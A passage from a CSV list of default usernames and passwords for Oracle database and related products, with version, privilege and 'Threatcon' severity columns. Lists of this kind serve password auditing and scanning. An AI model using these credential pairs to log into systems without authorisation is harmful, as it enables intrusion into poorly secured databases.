most serious),,\noracle,Database,Any,,RLA,RLA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RLM,RLM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RMAIL,RMAIL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,RMAN,RMAN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RRS,RRS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SAMPLE,SAMPLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SAP,6071992,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SAP,SAPR3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SAPR3,SAP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SCOTT,TIGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SCOTT,TIGGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SDOS_ICSAP,SDOS_ICSAP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SECDEMO,SECDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SERVICECONSUMER1,SERVICECONSUMER1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,SH,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SITEMINDER,SITEMINDER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SLIDE,SLIDEPW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SPIERSON,SPIERSON,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SSP,SSP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,STARTER,STARTER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,STRAT_USER,STRAT_PASSWD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SWPRO,SWPRO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SWUSER,SWUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYMPA,SYMPA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYS,0RACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL38,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL38I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL39,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL39I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,D_SYSPW,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,MANAG3R,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,MANAGER,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,SYS,ORACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,SYS,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,SYSPASS,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSADM,SYSADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSADMIN,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSADMIN,SYSADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSADMIN,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSMAN,OEM_TEMP,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSMAN,SYSMAN,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL38,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL38I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL39,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL39I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,CHANGE_ON_INSTALL,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,SYSTEM,D_SYSPW,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,D_SYSTPW,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,MANAG3R,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,MANAGER,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,SYSTEM,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,SYSTEMPASS,Threatcon 1 (most serious),,\noracle,Database,Any,,TAHITI,TAHITI,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TALBOT,MT6CH5,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TDOS_ICSAP,TDOS_ICSAP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEC,TECTEC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEST,PASSWD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEST,TEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TESTPILOT,TESTPILOT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEST_USER,TEST_USER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,THINSAMPLE,THINSAMPLEPW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TIBCO,TIBCO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TIP37,TIP37,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TRACESVR,TRACE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TRAVEL,TRAVEL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TSDEV,TSDEV,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TSUSER,TSUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TURBINE,TURBINE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UDDISYS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UDDISYS,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ULTIMATE,ULTIMATE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UM_ADMIN,UM_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UM_CLIENT,UM_CLIENT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER,USER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER0,USER0,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER1,USER1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER2,USER2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER3,USER3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER4,USER4,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER5,USER5,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER6,USER6,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER7,USER7,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER8,USER8,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER9,USER9,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER_NAME,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USUARIO,CLAVE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UTILITY,UTILITY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UTLBSTATU,UTLESTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VEA,VEA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,VEH,VEH,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,VERTEX_LOGIN,VERTEX_LOGIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VIDEOUSER,VIDEOUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VIF_DEVELOPER,VIF_DEV_PWD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VIRUSER,VIRUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VPD_ADMIN,AKF7D98S2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,VRR1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,VRR2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBCAL01,WEBCAL01,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBDB,WEBDB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBREAD,WEBREAD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBSYS,MANAGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBUSER,YOUR_PASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEST,WEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WFADMIN,WFADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WH,WH,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WIP,WIP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WIRELESS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WIRELESS,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKADMIN,WKADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,WKPROXY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKSYS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKSYS,WKSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKUSER,WKUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_PROXY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_PROXY,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_SYS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_SYS,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_TEST,WK_TEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WMS,WMS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WMSYS,WMSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WOB,WOB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WPS,WPS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WSH,WSH,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WSM,WSM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WWW,WWW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WWWUSER,WWWUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XADEMO,XADEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XDB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XDP,XDP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XLA,XLA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNC,XNC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNI,XNI,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XNM,XNM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNP,XNP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNS,XNS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XPRT,XPRT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XTR,XTR,Threatcon 2 (1 is most serious),,\noracle,Endeca Workbench,,,admin,admin,,,\noracle,Exadata,,,ilom-admin,ilom-admin Error,,,\noracle,Exadata,,,ilom-operator,ilom-operator,,,\noracle,Exadata,,,nm2user,nm2user,,,\noracle,Internet Directory Service,,,cn=orcladmin,welcome,,,\noracle,Internet Directory Service,,,cn=orcladmin,welcome,,any,\noracle,Oracle RDBMS,,,ADAMS,WOOD,,,\noracle,Oracle RDBMS,,,APPLSYS,APPLSYS,,,\noracle,Oracle RDBMS,,,APPS,APPS,,,\noracle,Oracle RDBMS,,,AQDEMO,AQDEMO,,,\noracle,Oracle RDBMS,,,AQUSER,AQUSER,,,\noracle,Oracle RDBMS,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,,AURORA@ORB@UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,,BLAKE,PAPER,,,\noracle,Oracle RDBMS,,,CATALOG,CATALOG,,,\noracle,Oracle RDBMS,,,CDEMO82,CDEMO82,,,\noracle,Oracle RDBMS,,,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle RDBMS,,,CDEMORID,CDEMORID,,,\noracle,Oracle RDBMS,,,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle RDBMS,,,CLARK,CLOTH,,,\noracle,Oracle RDBMS,,,CTXDEMO,CTXDEMO,,,\noracle,Oracle RDBMS,,,CTXSYS,,,,\noracle,Oracle RDBMS,,,DEMO,DEMO,,,\noracle,Oracle RDBMS,,,DEMO8,DEMO8,,,\noracle,Oracle RDBMS,,,EMP,EMP,,,\noracle,Oracle RDBMS,,,FND,FND,,,\noracle,Oracle RDBMS,,,GPFD,GPFD,,,\noracle,Oracle RDBMS,,,GPLD,GPLD,,,\noracle,Oracle RDBMS,,,JONES,STEEL,,,\noracle,Oracle RDBMS,,,MILLER,MILLER,,,\noracle,Oracle RDBMS,,,MMO2,MMO2,,,\noracle,Oracle RDBMS,,,MOREAU,MOREAU,,,\noracle,Oracle RDBMS,,,MTYSYS,MTYSYS,,,\noracle,Oracle RDBMS,,,NAMES,NAMES,,,\noracle,Oracle RDBMS,,,OCITEST,OCITEST,,,\noracle,Oracle RDBMS,,,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle RDBMS,,,ORDSYS,ORDSYS,,,\noracle,Oracle RDBMS,,,OUTLN,OUTLN,,,\noracle,Oracle RDBMS,,,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle RDBMS,,,PRIMARY,PRIMARY,,,\noracle,Oracle RDBMS,,,RE,RE,,,\noracle,Oracle RDBMS,,,RMAIL,RMAIL,,,\noracle,Oracle RDBMS,,,RMAN,RMAN,,,\noracle,Oracle RDBMS,,,SCOTT,TIGER,,,\noracle,Oracle RDBMS,,,SECDEMO,SECDEMO,,,\noracle,Oracle RDBMS,,,SYSADM,SYSADM,,,\noracle,Oracle RDBMS,,,SYSTEM,MANAGER,,,\noracle,Oracle RDBMS,,,TRACESRV,TRACE,,,\noracle,Oracle RDBMS,,,TSDEV,TSDEV,,,\noracle,Oracle RDBMS,,,TSUSER,TSUSER,,,\noracle,Oracle RDBMS,,,USER0,USER0,,,\noracle,Oracle RDBMS,,,USER1,USER1,,,\noracle,Oracle RDBMS,,,USER2,USER2,,,\noracle,Oracle RDBMS,,,USER3,USER3,,,\noracle,Oracle RDBMS,,,USER4,USER4,,,\noracle,Oracle RDBMS,,,USER5,USER5,,,\noracle,Oracle RDBMS,,,USER6,USER6,,,\noracle,Oracle RDBMS,,,USER7,USER7,,,\noracle,Oracle RDBMS,,,USER8,USER8,,,\noracle,Oracle RDBMS,,,USER9,USER9,,,\noracle,Oracle RDBMS,,7 and 8,ADAMS,WOOD,,,\noracle,Oracle RDBMS,,7 and 8,APPLSYS,APPLSYS,,,\noracle,Oracle RDBMS,,7 and 8,APPS,APPS,,,\noracle,Oracle RDBMS,,7 and 8,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,7 and 8,AURORA@ORB@UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,7 and 8,BLAKE,PAPER,,,\noracle,Oracle RDBMS,,7 and 8,CLARK,CLOTH,,,\noracle,Oracle RDBMS,,7 and 8,CTXDEMO,CTXDEMO,,,\noracle,Oracle RDBMS,,7 and 8,CTXSYS,CTXSYS,,,\noracle,Oracle RDBMS,,7 and 8,DBSNMP,DBSNMP,,,\noracle,Oracle RDBMS,,7 and 8,DEMO,DEMO,,,\noracle,Oracle RDBMS,,7 and 8,JONES,STEEL,,,\noracle,Oracle RDBMS,,7 and 8,MDSYS,MDSYS,,,\noracle,Oracle RDBMS,,7 and 8,NAMES,NAMES,,,\noracle,Oracle RDBMS,,7 and 8,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle RDBMS,,7 and 8,ORDSYS,ORDSYS,,,\noracle,Oracle RDBMS,,7 and 8,OUTLN,OUTLN,,,\noracle,Oracle RDBMS,,7 and 8,RMAN,RMAN,,,\noracle,Oracle RDBMS,,7 and 8,SCOTT,TIGER,,,\noracle,Oracle RDBMS,,7 and 8,SYS,CHANGE_ON_INSTALL,,,\noracle,Oracle RDBMS,,7 and 8,SYSADM,SYSADM,,,\noracle,Oracle RDBMS,,7 and 8,SYSTEM,MANAGER,,,\noracle,Oracle RDBMS,,7 and 8,TRACESRV,TRACE,,,\noracle,Oracle RDBMS,,8i Linux,MODTEST,YES,,,\noracle,Oracle RDBMS,,8i WinNT,MTYSYS,MTYSYS,,,\noracle,Oracle RDBMS,,8i WinNT,RE,RE,,,\noracle,Oracle RDBMS,,8i WinNT,RMAIL,RMAIL,,,\noracle,Oracle RDBMS,,8i WinNT,SAMPLE,SAMPLE,,,\noracle,Oracle RDBMS,,8i,AQDEMO,AQDEMO,,,\noracle,Oracle RDBMS,,8i,AQUSER,AQUSER,,,\noracle,Oracle RDBMS,,8i,CATALOG,CATALOG,,,\noracle,Oracle RDBMS,,8i,CDEMO82,CDEMO82,,,\noracle,Oracle RDBMS,,8i,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle RDBMS,,8i,CDEMORID,CDEMORID,,,\noracle,Oracle RDBMS,,8i,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle RDBMS,,8i,COMPANY,COMPANY,,,\noracle,Oracle RDBMS,,8i,DEMO8,DEMO8,,,\noracle,Oracle RDBMS,,8i,EMP,EMP,,,\noracle,Oracle RDBMS,,8i,EVENT,EVENT,,,\noracle,Oracle RDBMS,,8i,FINANCE,FINANCE,,,\noracle,Oracle RDBMS,,8i,FND,FND,,,\noracle,Oracle RDBMS,,8i,GPFD,GPFD,,,\noracle,Oracle RDBMS,,8i,GPLD,GPLD,,,\noracle,Oracle RDBMS,,8i,MFG,MFG,,,\noracle,Oracle RDBMS,,8i,MILLER,MILLER,,,\noracle,Oracle RDBMS,,8i,MMO2,MMO2,,,\noracle,Oracle RDBMS,,8i,MOREAU,MOREAU,,,\noracle,Oracle RDBMS,,8i,OCITEST,OCITEST,,,\noracle,Oracle RDBMS,,8i,PO,PO,,,\noracle,Oracle RDBMS,,8i,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle RDBMS,,8i,PRIMARY,PRIMARY,,,\noracle,Oracle RDBMS,,8i,PUBSUB,PUBSUB,,,\noracle,Oracle RDBMS,,8i,SECDEMO,SECDEMO,,,\noracle,Oracle RDBMS,,8i,SYSMAN,oem_temp,,,\noracle,Oracle RDBMS,,8i,TSDEV,TSDEV,,,\noracle,Oracle RDBMS,,8i,TSUSER,TSUSER,,,\noracle,Oracle RDBMS,,8i,USER0,USER0,,,\noracle,Oracle RDBMS,,8i,USER1,USER1,,,\noracle,Oracle RDBMS,,8i,USER2,USER2,,,\noracle,Oracle RDBMS,,8i,USER3,USER3,,,\noracle,Oracle RDBMS,,8i,USER4,USER4,,,\noracle,Oracle RDBMS,,8i,USER5,USER5,,,\noracle,Oracle RDBMS,,8i,USER6,USER6,,,\noracle,Oracle RDBMS,,8i,USER7,USER7,,,\noracle,Oracle RDBMS,,8i,USER8,USER8,,,\noracle,Oracle RDBMS,,8i,USER9,USER9,,,\noracle,Oracle RDBMS,,8i,VRR1,VRR1,,,\noracle,Oracle RDBMS,,All Privileges with Admin,MDSYS,MDSYS,,,\noracle,Oracle RDBMS,,All Privileges,COMPANY,COMPANY,,,\noracle,Oracle RDBMS,,All Privileges,FINANCE,FINANCE,,,\noracle,Oracle RDBMS,,All Privileges,MFG,MFG,,,\noracle,Oracle RDBMS,,DBA +,SYS,CHANGE_ON_INSTALL,,,\noracle,Oracle RDBMS,,DBA,CTXSYS,CTXSYS,,,\noracle,Oracle RDBMS,,DBA,EVENT,EVENT,,,\noracle,Oracle RDBMS,,DBA,MODTEST,YES,,,\noracle,Oracle RDBMS,,DBA,PO,PO,,,\noracle,Oracle RDBMS,,DBA,PUBSUB,PUBSUB,,,\noracle,Oracle RDBMS,,DBA,SAMPLE,SAMPLE,,,\noracle,Oracle RDBMS,,DBA,SYSMAN,oem_temp,,,\noracle,Oracle RDBMS,,DBA,VRR1,VRR1,,,\noracle,Oracle RDBMS,,RESOURCE and CONNECT roles,DBSNMP,DBSNMP,,,\noracle,Oracle RDBMS,7 and 8,Multi,ADAMS,WOOD,,,\noracle,Oracle RDBMS,7 and 8,Multi,APPLSYS,APPLSYS,,,\noracle,Oracle RDBMS,7 and 8,Multi,APPS,APPS,,,\noracle,Oracle RDBMS,7 and 8,Multi,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,7 and 8,Multi,AURORA@ORB@UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,7 and 8,Multi,BLAKE,PAPER,,,\noracle,Oracle RDBMS,7 and 8,Multi,CLARK,CLOTH,,,\noracle,Oracle RDBMS,7 and 8,Multi,CTXDEMO,CTXDEMO,,,\noracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,,,,\noracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,CTXSYS,DBA,,\noracle,Oracle RDBMS,7 and 8,Multi,DBSNMP,DBSNMP,RESOURCE and CONNECT roles,,\noracle,Oracle RDBMS,7 and 8,Multi,DEMO,DEMO,,,\noracle,Oracle RDBMS,7 and 8,Multi,JONES,STEEL,,,\noracle,Oracle RDBMS,7 and 8,Multi,MDSYS,MDSYS,All Privileges with Admin,,\noracle,Oracle RDBMS,7 and 8,Multi,NAMES,NAMES,,,\noracle,Oracle RDBMS,7 and 8,Multi,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle RDBMS,7 and 8,Multi,ORDSYS,ORDSYS,,,\noracle,Oracle RDBMS,7 and 8,Multi,OUTLN,OUTLN,,,\noracle,Oracle RDBMS,7 and 8,Multi,RMAN,RMAN,,,\noracle,Oracle RDBMS,7 and 8,Multi,SCOTT,TIGER,,,\noracle,Oracle RDBMS,7 and 8,Multi,SYS,CHANGE_ON_INSTALL,DBA +,,\noracle,Oracle RDBMS,7 and 8,Multi,SYSADM,SYSADM,,,\noracle,Oracle RDBMS,7 and 8,Multi,SYSTEM,MANAGER,,,\noracle,Oracle RDBMS,7 and 8,Multi,TRACESRV,TRACE,,,\noracle,Oracle RDBMS,8i Linux,Multi,MODTEST,YES,DBA,,\noracle,Oracle RDBMS,8i WinNT,Multi,MTYSYS,MTYSYS,,,\noracle,Oracle RDBMS,8i WinNT,Multi,RE,RE,,,\noracle,Oracle RDBMS,8i WinNT,Multi,RMAIL,RMAIL,,,\noracle,Oracle RDBMS,8i WinNT,Multi,SAMPLE,SAMPLE,DBA,,\noracle,Oracle RDBMS,8i,Multi,AQDEMO,AQDEMO,,,\noracle,Oracle RDBMS,8i,Multi,AQUSER,AQUSER,,,\noracle,Oracle RDBMS,8i,Multi,CATALOG,CATALOG,,,\noracle,Oracle RDBMS,8i,Multi,CDEMO82,CDEMO82,,,\noracle,Oracle RDBMS,8i,Multi,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle RDBMS,8i,Multi,CDEMORID,CDEMORID,,,\noracle,Oracle RDBMS,8i,Multi,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle RDBMS,8i,Multi,COMPANY,COMPANY,All Privileges,,\noracle,Oracle RDBMS,8i,Multi,DEMO8,DEMO8,,,\noracle,Oracle RDBMS,8i,Multi,EMP,EMP,,,\noracle,Oracle RDBMS,8i,Multi,EVENT,EVENT,DBA,,\noracle,Oracle RDBMS,8i,Multi,FINANCE,FINANCE,All Privileges,,\noracle,Oracle RDBMS,8i,Multi,FND,FND,,,\noracle,Oracle RDBMS,8i,Multi,GPFD,GPFD,,,\noracle,Oracle RDBMS,8i,Multi,GPLD,GPLD,,,\noracle,Oracle RDBMS,8i,Multi,MFG,MFG,All Privileges,,\noracle,Oracle RDBMS,8i,Multi,MILLER,MILLER,,,\noracle,Oracle RDBMS,8i,Multi,MMO2,MMO2,,,\noracle,Oracle RDBMS,8i,Multi,MOREAU,MOREAU,,,\noracle,Oracle RDBMS,8i,Multi,OCITEST,OCITEST,,,\noracle,Oracle RDBMS,8i,Multi,PO,PO,DBA,,\noracle,Oracle RDBMS,8i,Multi,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle RDBMS,8i,Multi,PRIMARY,PRIMARY,,,\noracle,Oracle RDBMS,8i,Multi,PUBSUB,PUBSUB,DBA,,\noracle,Oracle RDBMS,8i,Multi,SECDEMO,SECDEMO,,,\noracle,Oracle RDBMS,8i,Multi,SYSMAN,oem_temp,DBA,,\noracle,Oracle RDBMS,8i,Multi,TSDEV,TSDEV,,,\noracle,Oracle RDBMS,8i,Multi,TSUSER,TSUSER,,,\noracle,Oracle RDBMS,8i,Multi,USER0,USER0,,,\noracle,Oracle RDBMS,8i,Multi,USER1,USER1,,,\noracle,Oracle RDBMS,8i,Multi,USER2,USER2,,,\noracle,Oracle RDBMS,8i,Multi,USER3,USER3,,,\noracle,Oracle RDBMS,8i,Multi,USER4,USER4,,,\noracle,Oracle RDBMS,8i,Multi,USER5,USER5,,,\noracle,Oracle RDBMS,8i,Multi,USER6,USER6,,,\noracle,Oracle RDBMS,8i,Multi,USER7,USER7,,,\noracle,Oracle RDBMS,8i,Multi,USER8,USER8,,,\noracle,Oracle RDBMS,8i,Multi,USER9,USER9,,,\noracle,Oracle RDBMS,8i,Multi,VRR1,VRR1,DBA,,\noracle,Oracle RDBMS,Any,Multi,system/manager,sys/change_on_install,Admin,,\noracle,Oracle,,,ADAMS,WOOD,,,\noracle,Oracle,,,ADLDEMO,ADLDEMO,,,\noracle,Oracle,,,ADMIN,JETSPEED,,,\noracle,Oracle,,,ADMINISTRATOR,ADMINISTRATOR,,,\noracle,Oracle,,,ANDY,SWORDFISH,,,\noracle,Oracle,,,AP,AP,,,\noracle,Oracle,,,APPLSYS,FND,,,\noracle,Oracle,,,APPLSYSPUB,FNDPUB,,,\noracle,Oracle,,,APPS,APPS,,,\noracle,Oracle,,,APPUSER,APPUSER,,,\noracle,Oracle,,,AQ,AQ,,,\noracle,Oracle,,,AQDEMO,AQDEMO,,,\noracle,Oracle,,,AQJAVA,AQJAVA,,,\noracle,Oracle,,,AQUSER,AQUSER,,,\noracle,Oracle,,,AUDIOUSER,AUDIOUSER,,,\noracle,Oracle,,,AURORA$JIS$UTILITY$,,,,\noracle,Oracle,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle,,,BC4J,BC4J,,,\noracle,Oracle,,,BLAKE,PAPER,,,\noracle,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,,\noracle,Oracle,,,CATALOG,CATALOG,,,\noracle,Oracle,,,CDEMO82,CDEMO82,,,\noracle,Oracle,,,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle,,,CDEMORID,CDEMORID,,,\noracle,Oracle,,,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle,,,CENTRA,CENTRA,,,\noracle,Oracle,,,CIDS,CIDS,,,\noracle,Oracle,,,CIS,CIS,,,\noracle,Oracle,,,CISINFO,CISINFO,,,\noracle,Oracle,,,CLARK,CLOTH,,,\noracle,Oracle,,,COMPANY,